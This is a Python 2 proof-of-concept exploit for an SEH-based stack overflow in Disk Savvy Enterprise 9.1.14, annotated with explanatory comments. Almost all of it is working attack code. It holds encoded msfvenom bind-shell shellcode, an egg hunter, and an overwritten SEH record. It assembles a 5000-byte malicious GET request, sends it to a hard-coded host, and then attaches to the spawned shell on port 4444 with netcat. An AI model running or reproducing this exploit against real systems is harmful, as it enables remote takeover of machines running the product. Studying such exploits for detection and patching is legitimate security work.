
#!/usr/bin/python
# Proof-of-concept for an SEH-based stack overflow in Disk Savvy Enterprise
# 9.1.14, triggered by an oversized path in a single HTTP GET request to the
# product's web interface (see the request assembled below).
#
# Python 2 script: string literals are byte strings and the `print` statement
# is used, so it does not run unmodified under Python 3.
import socket,os,time


#SEH Stack Overflow in GET request
#Disk Savvy Enterprise 9.1.14
#Tested on Windows XP SP3 && Windows 7 Professional


# Target address and port of the web interface; both are hard-coded and
# edited by hand before running.
host = "192.168.1.20"
port = 80


#badchars \x00\x09\x0a\x0d\x20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
# `buf` is the msfvenom-generated payload: a Windows bind shell listening on
# TCP 4444, encoded to avoid the bad characters listed above. It is opaque
# machine code and is reproduced here verbatim.
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"


# 32-byte egg hunter stub. It scans process memory for the 8-byte tag held in
# `egg` (the 4-byte half "w00t" is embedded in the stub as \x77\x30\x30\x74)
# and, once the tag is found, transfers execution to the bytes that follow
# it — in the layout below, the NOPs and then `buf`.
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"+
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77"+
"\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"+
"\xff\xe7")


# Overwritten SEH record. `seh` is the handler address: a pop/pop/ret gadget
# inside libspp.dll (little-endian 0x101142c0), which makes the exception
# dispatcher return into `nseh`. `nseh` is a short forward jump that skips
# over the handler address into the NOP sled and the egg hunter.
seh = "\xc0\x42\x11\x10" #pop pop ret [libspp.dll]
nseh = "\xeb\x06\x90\x90" #jmp short +0x8


egg = "w00tw00t"
# Byte distance from the start of `crash` to the SEH record; presumably
# recovered from a crash dump with a cyclic pattern — not derivable from
# this file.
offset = 551
# Total length of the malicious path; the padding below is sized so that
# `crash` is exactly this many bytes.
buffer_size = 5000


# Layout of the 5000-byte path, in order (lengths in bytes):
#   10 * "A" | egg (8) | 2 NOPs          -> 20 bytes
#   buf | NOP sled                        -> pads up to `offset` (551)
#   nseh (4) | seh (4) | 8 NOPs           -> 16 bytes, the SEH record
#   egghunter | "D" filler                -> pads up to `buffer_size`
crash = "\x41"*10 + egg + "\x90"*2
crash += buf + "\x90"*(offset-20-len(buf))
crash += nseh + seh + "\x90"*8
crash += egghunter + "\x44"*(buffer_size-offset-16-len(egghunter))


# Raw HTTP/1.1 request carrying `crash` as the path. Note there is no space
# between the path and "HTTP/1.1", so the request line is malformed HTTP
# (`GET /<5000 bytes>HTTP/1.1`); that, plus the ~5 KB request line, is the
# observable signature of this PoC on the wire.
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"


# Fire-and-forget: one TCP connection, the request is sent, nothing is read
# back, and no error is handled if the service is down or unreachable.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)

s.close()


# Give the payload's bind shell time to start, then attach to it with netcat
# on the port baked into the msfvenom payload (4444). `host` is a hard-coded
# literal here, so the shell command is not built from untrusted input.
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + host + " 4444")